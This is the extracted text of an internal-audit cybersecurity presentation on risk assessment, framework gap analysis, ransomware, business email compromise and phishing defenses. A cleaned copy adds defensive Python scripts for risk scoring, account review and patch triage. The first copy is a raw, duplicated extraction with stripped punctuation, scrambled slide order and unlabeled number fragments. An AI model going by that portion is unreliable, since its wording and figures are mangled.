Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-quantitatively measure cybersecurity risks, i.e., to identify, estimate and prioritize information security risks
(Process shown on the slide: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results)

STEP 1 - CYBERSECURITY RISK ASSESSMENT (continued)
Key to an effective cybersecurity program is to understand the Company's information assets. Questions to ask:
• What value do the assets have? For example: credit card data, employee or customer records, bank accounts, intellectual property, trade secrets, insider knowledge
• Where is the data located?
• Which cash-in / cash-out processes touch it?
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT (continued)
• Through formal risk assessments with all critical functions in the business, identify where data lives and how it should be classified, then perform a threat analysis to semi-quantitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine which critical data assets in your environment are most at risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business.
(Slide shows an example screenshot of a critical data asset risk assessment)
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and the risk assessment results to identify and prioritize the controls to implement, starting with the highest-priority, most impactful controls
STEP 3 - CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of the controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
(Slide shows a bar chart, MITIGATING CONTROL COUNTS, of how many high-risk asset/threat instances each candidate control reduces; the bar values are not recoverable from the extracted text)
How the counts were built:
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have a SPECIFIC THREAT with a cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify the mitigating controls to implement to mitigate that threat
D) Total all instances where a control reduced risk
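Steps A through D above, together with the Step 1 scoring they depend on, can be run as a short script. The following Python is an added example written for this page; it is not the speaker's tool or the spreadsheet shown on the slide. The scoring formula (asset classification 1–5 × threat likelihood 1–5 × threat impact 1–10) is an assumption chosen so that the slide's threshold of 100 is meaningful, and the assets, threats and control-to-threat mapping are constructed sample data, not the figures behind the chart.

```python
"""Steps 1-3 (risk scoring, high-risk filter, mitigating-control counts) as one script.

Added example for this write-up; it is not the speaker's tool or the spreadsheet
shown on the slide. The scoring formula is an assumption chosen so the slide's
threshold of 100 is meaningful:
    risk = asset classification (1-5) x threat likelihood (1-5) x threat impact (1-10)
All assets, threats and control mappings below are constructed sample data.
"""
from collections import Counter
from dataclasses import dataclass, field

RISK_THRESHOLD = 100  # slide step A: "calc cybersecurity risk > 100"


@dataclass
class Asset:
    name: str
    owner: str            # business function interviewed during Step 1
    location: str         # where the data lives
    classification: int   # 1 (public) .. 5 (most critical), agreed with IT
    # threat name -> (likelihood 1-5, impact 1-10) from the threat-modeling session
    threats: dict = field(default_factory=dict)


# Constructed mapping: which candidate mitigating controls address which threat.
CONTROLS_FOR_THREAT = {
    "ransomware": ["patch management", "endpoint protection", "offline backups"],
    "phishing / BEC": ["security awareness training", "multi-factor authentication"],
    "credential theft": ["multi-factor authentication", "privileged access review"],
    "unpatched exploit": ["patch management", "vulnerability scanning"],
}

SAMPLE_ASSETS = [
    Asset("payroll database", "HR", "on-prem SQL Server", 5,
          {"ransomware": (4, 9), "credential theft": (3, 8), "phishing / BEC": (4, 6)}),
    Asset("AP vendor master file", "Accounting", "ERP", 4,
          {"phishing / BEC": (5, 8), "credential theft": (3, 7)}),
    Asset("marketing web server", "Marketing", "cloud VM", 2,
          {"unpatched exploit": (4, 6), "ransomware": (2, 4)}),
]


def risk_score(asset: Asset, threat: str) -> int:
    """Semi-quantitative score for one asset/threat pair (assumed formula, see header)."""
    likelihood, impact = asset.threats[threat]
    return asset.classification * likelihood * impact


def asset_risk(asset: Asset) -> int:
    """Step A input: an asset's calculated risk is its worst single threat."""
    return max(risk_score(asset, t) for t in asset.threats)


def high_risk_pairs(assets):
    """Steps A and B: keep only (asset, threat) pairs whose SPECIFIC threat exceeds the threshold."""
    pairs = []
    for asset in assets:
        if asset_risk(asset) <= RISK_THRESHOLD:            # step A: system is not high risk
            continue
        for threat in asset.threats:
            if risk_score(asset, threat) > RISK_THRESHOLD:  # step B: this threat is over 100
                pairs.append((asset.name, threat))
    return pairs


def mitigating_control_counts(assets) -> Counter:
    """Steps C and D: total the instances where each control would reduce a high risk."""
    counts = Counter()
    for _, threat in high_risk_pairs(assets):
        for control in CONTROLS_FOR_THREAT.get(threat, []):
            counts[control] += 1
    return counts


def prioritized_roadmap(assets):
    """Controls ordered by how many high-risk instances they address (most first)."""
    return mitigating_control_counts(assets).most_common()


if __name__ == "__main__":
    for asset in SAMPLE_ASSETS:
        print(f"{asset.name:24s} calculated risk = {asset_risk(asset):4d}")
    print("high-risk asset/threat pairs:", high_risk_pairs(SAMPLE_ASSETS))
    for control, n in prioritized_roadmap(SAMPLE_ASSETS):
        print(f"{n:2d}  {control}")
```

Run as-is it prints each asset's calculated risk, the asset/threat pairs over the threshold, and the control counts sorted by how many high-risk instances each one addresses, which is the prioritization the roadmap bullet asks for. Changing the formula or the threshold changes which pairs pass step B, so both belong in the workpapers alongside the results.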
STEP 4 - CYBERSECURITY REPORTING
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
COBIT 5 process capability levels used for the maturity rating:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
(COBIT 5 also defines level 0 = INCOMPLETE, for a process that is not implemented or does not achieve its purpose; it is not shown on the slide)
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 Rev. 5, Security and Privacy Controls for Information Systems and Organizations
• NIST Cybersecurity Framework v1.1
• Various other NIST Special Publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO/IEC 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5

Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework, and 44% use more than one framework. – Source: itgovernanceusa.com

CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
(Slide shows the list of CIS Critical Security Controls)
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors, and is alerted on, changes to elevated privileges
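The four bullets above can be tested against data rather than by interview alone. The following Python is an added example for this page, not the speaker's procedure: it reviews a directory export for the privileged-account hygiene points listed (a mailbox on an admin account as a sign it is used for daily tasks, passwords shared by several people, a length policy no stricter than normal accounts, password age or never-expires), and diffs two snapshots of a privileged group to flag additions with no approved change record. The export layout, the thresholds and the change-ticket field are assumptions, and every account below is constructed.

```python
"""Privileged-account review over a directory export: added example, not from the deck.

The account list and group-membership snapshots below are constructed stand-ins
for what IT would export for the auditor (e.g. from Active Directory). The
thresholds are assumptions; substitute the company's own password standard.
"""
from datetime import date

ADMIN_MAX_PASSWORD_AGE_DAYS = 90    # assumed stricter standard for privileged accounts
USER_MAX_PASSWORD_AGE_DAYS = 365    # assumed standard for normal accounts
ADMIN_MIN_PASSWORD_LENGTH = 15      # assumed minimum length policy for privileged accounts
REVIEW_DATE = date(2019, 3, 1)

# Constructed export. "mailbox" = the account has email (a sign it is used for daily work),
# "owners" = the people who know the password, "min_len_policy" = length rule applied to it.
ACCOUNTS = [
    {"sam": "jdoe", "privileged": False, "owners": ["jdoe"], "mailbox": True,
     "pwd_last_set": date(2018, 11, 1), "pwd_never_expires": False, "min_len_policy": 8},
    {"sam": "jdoe-adm", "privileged": True, "owners": ["jdoe"], "mailbox": False,
     "pwd_last_set": date(2019, 1, 15), "pwd_never_expires": False, "min_len_policy": 15},
    {"sam": "helpdesk-adm", "privileged": True, "owners": ["asmith", "bjones"], "mailbox": True,
     "pwd_last_set": date(2017, 6, 1), "pwd_never_expires": True, "min_len_policy": 8},
    {"sam": "svc-backup", "privileged": True, "owners": ["infra team"], "mailbox": False,
     "pwd_last_set": date(2016, 3, 3), "pwd_never_expires": True, "min_len_policy": 15},
]

# Two snapshots of a privileged group (constructed) and the change records IT can produce.
DOMAIN_ADMINS_PREVIOUS = {"jdoe-adm", "helpdesk-adm", "svc-backup"}
DOMAIN_ADMINS_CURRENT = {"jdoe-adm", "helpdesk-adm", "svc-backup", "contractor7", "mlee-adm"}
APPROVED_CHANGES = {"mlee-adm": "CHG-1042"}   # account -> change ticket authorizing the add


def review_account(acct, today=REVIEW_DATE):
    """Audit exceptions for one account; an empty list means no finding."""
    findings = []
    max_age = USER_MAX_PASSWORD_AGE_DAYS
    if acct["privileged"]:
        max_age = ADMIN_MAX_PASSWORD_AGE_DAYS
        if acct["mailbox"]:
            findings.append("privileged account has a mailbox: used for email/browsing")
        if len(acct["owners"]) > 1:
            findings.append(f"privileged account shared by {len(acct['owners'])} people")
        if acct["min_len_policy"] < ADMIN_MIN_PASSWORD_LENGTH:
            findings.append("password policy no stricter than normal accounts")
    if acct["pwd_never_expires"]:
        findings.append("password set to never expire")
    else:
        age = (today - acct["pwd_last_set"]).days
        if age > max_age:
            findings.append(f"password age {age} days exceeds {max_age}-day maximum")
    return findings


def review_all(accounts, today=REVIEW_DATE):
    """Map account -> findings, for the accounts with at least one exception."""
    result = {}
    for acct in accounts:
        findings = review_account(acct, today)
        if findings:
            result[acct["sam"]] = findings
    return result


def privilege_changes(previous, current, approved):
    """Diff two membership snapshots and flag additions with no approved change record."""
    added = sorted(current - previous)
    removed = sorted(previous - current)
    return {"added": added, "removed": removed,
            "unapproved_additions": [a for a in added if a not in approved]}


if __name__ == "__main__":
    for sam, findings in review_all(ACCOUNTS).items():
        print(sam)
        for f in findings:
            print("   -", f)
    print(privilege_changes(DOMAIN_ADMINS_PREVIOUS, DOMAIN_ADMINS_CURRENT, APPROVED_CHANGES))
```

The membership diff is the control behind the last bullet: if IT cannot show a ticket for an addition, the alerting either does not exist or was ignored. Service accounts with never-expiring passwords surface the same way as human admin accounts, which is usually where the "sharing" discussion with IT starts.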
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures:
  • 99% of exploited vulnerabilities were compromised more than a year after the patch was published
  • Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management, and assess whether sufficient mitigating controls are in place
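The vulnerability-management checks above reduce to comparing three artefacts IT can provide: the asset inventory, the scanner export and the risk-acceptance register. The following Python is an added example for this page, not the speaker's workpaper; it finds scanned devices that are missing from the inventory, inventory devices the scan never reached, findings past an assumed remediation SLA (with the "patch older than a year" flag from the statistic above), and accepted risks whose acceptance has expired or lacks an owner or a mitigating control. The hostnames, IPs, findings and SLAs are constructed assumptions.

```python
"""Patch and vulnerability-management analytics: added example, not from the deck.

Inputs are constructed stand-ins for what IT hands the auditor: the asset
inventory, a vulnerability-scanner export, and the register of formally
accepted risks. The remediation SLAs are assumptions for the illustration.
"""
from collections import Counter
from datetime import date

SLA_DAYS = {"critical": 14, "high": 30, "medium": 90, "low": 180}   # assumed days to patch
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
SCAN_DATE = date(2019, 3, 1)

# Constructed inventory: hostname -> IP the asset register knows about.
INVENTORY = {"fs01": "10.0.1.10", "erp01": "10.0.1.20", "ws-acct-07": "10.0.2.57",
             "fw-edge": "10.0.0.1", "vpn-gw": "203.0.113.5"}

# Constructed scanner export: one open finding per row, with the vendor patch date.
FINDINGS = [
    {"host": "fs01", "ip": "10.0.1.10", "title": "OS update missing (SMB)", "severity": "critical",
     "patch_published": date(2017, 3, 14), "internet_facing": False},
    {"host": "erp01", "ip": "10.0.1.20", "title": "Java runtime out of date", "severity": "high",
     "patch_published": date(2018, 10, 16), "internet_facing": False},
    {"host": "ws-acct-07", "ip": "10.0.2.57", "title": "Browser update missing", "severity": "high",
     "patch_published": date(2019, 2, 20), "internet_facing": False},
    {"host": "unknown-printer", "ip": "10.0.3.99", "title": "Embedded web server outdated",
     "severity": "medium", "patch_published": date(2016, 5, 2), "internet_facing": False},
    {"host": "vpn-gw", "ip": "203.0.113.5", "title": "VPN appliance firmware outdated",
     "severity": "critical", "patch_published": date(2018, 12, 1), "internet_facing": True},
]

# Constructed risk-acceptance register: who accepted, until when, and the compensating control.
RISK_ACCEPTANCES = [
    {"host": "fs01", "title": "OS update missing (SMB)", "owner": "CIO",
     "expires": date(2018, 12, 31), "mitigating_control": "SMBv1 disabled; host segmented"},
    {"host": "erp01", "title": "Java runtime out of date", "owner": "CFO",
     "expires": date(2019, 6, 30), "mitigating_control": "Java disabled in browser; app allow-listing"},
]


def unknown_devices(inventory, findings):
    """Scanned hosts whose IP is not in the inventory: devices the company did not know it had."""
    known_ips = set(inventory.values())
    return sorted({(f["host"], f["ip"]) for f in findings if f["ip"] not in known_ips})


def unscanned_assets(inventory, findings):
    """Inventory hosts the scan never reached: a coverage gap, not a clean result."""
    scanned = {f["host"] for f in findings}
    return sorted(h for h in inventory if h not in scanned)


def acceptance_status(finding, acceptances, today):
    """'accepted', 'acceptance_expired', 'acceptance_incomplete', or None if not in the register."""
    for acc in acceptances:
        if acc["host"] == finding["host"] and acc["title"] == finding["title"]:
            if not acc.get("owner") or not acc.get("mitigating_control"):
                return "acceptance_incomplete"
            return "acceptance_expired" if acc["expires"] < today else "accepted"
    return None


def triage(findings, acceptances, today=SCAN_DATE):
    """Classify every finding against its SLA and the risk register, worst first."""
    rows = []
    for f in findings:
        age = (today - f["patch_published"]).days
        status = "within_sla" if age <= SLA_DAYS[f["severity"]] else "overdue"
        if status == "overdue":
            status = acceptance_status(f, acceptances, today) or status
        rows.append({"host": f["host"], "title": f["title"], "severity": f["severity"],
                     "days_since_patch": age, "over_one_year": age > 365,
                     "internet_facing": f["internet_facing"], "status": status})
    # internet-facing first, then by severity, then the oldest missing patch first
    rows.sort(key=lambda r: (not r["internet_facing"], SEVERITY_RANK[r["severity"]],
                             -r["days_since_patch"]))
    return rows


def summary(rows):
    """Counts by status plus the 'patch older than a year' figure from the slide."""
    counts = Counter(r["status"] for r in rows)
    counts["over_one_year"] = sum(r["over_one_year"] for r in rows)
    return counts


if __name__ == "__main__":
    print("unknown devices:", unknown_devices(INVENTORY, FINDINGS))
    print("never scanned:  ", unscanned_assets(INVENTORY, FINDINGS))
    rows = triage(FINDINGS, RISK_ACCEPTANCES)
    for r in rows:
        print(f"{r['host']:16s} {r['severity']:8s} {r['days_since_patch']:5d}d  {r['status']}")
    print(dict(summary(rows)))
```

The two inventory comparisons matter as much as the SLA table: a device the scanner found but the register does not list is exactly the "we do not know all of our devices" problem, and a registered device the scan never reached means the clean report for it is silence, not assurance. An expired acceptance is reported separately from a plain overdue finding because it shows the tracking step failed, not only the patching step.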
CYBERSECURITY – SUMMARY QUICK HIT LIST
Review at least the following for your company:
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management, and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and that backups are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK

QUESTIONS
David Losacco, Principal
mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates | stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and little effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS operator handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and will reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts, impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center (IC3) said that, based on fraud reports submitted from October 2013 to May 2018, there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident:
  • All nine lost at least $1 million to the BEC scam
  • Two companies lost more than $30 million each
  • In total the nine issuers lost almost $100 million
BEC & PHISHING
Phishing: A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment or following the link.
Spear Phishing: Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include clone phishing (reusing a previous legitimate email) and whaling (targeting a high-level executive). Examples:
• "CEO" email to the Treasurer
• HR phishing for employee data
• W-2 data phishing (the IRS has issued a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts (the example banner shown on the slide is not recoverable from the extracted text).
This "band-aid" is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 revenue overtook traditional Office license revenue for Microsoft in the 4th quarter of 2017
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee, and the hacker is internal to email and Office 365
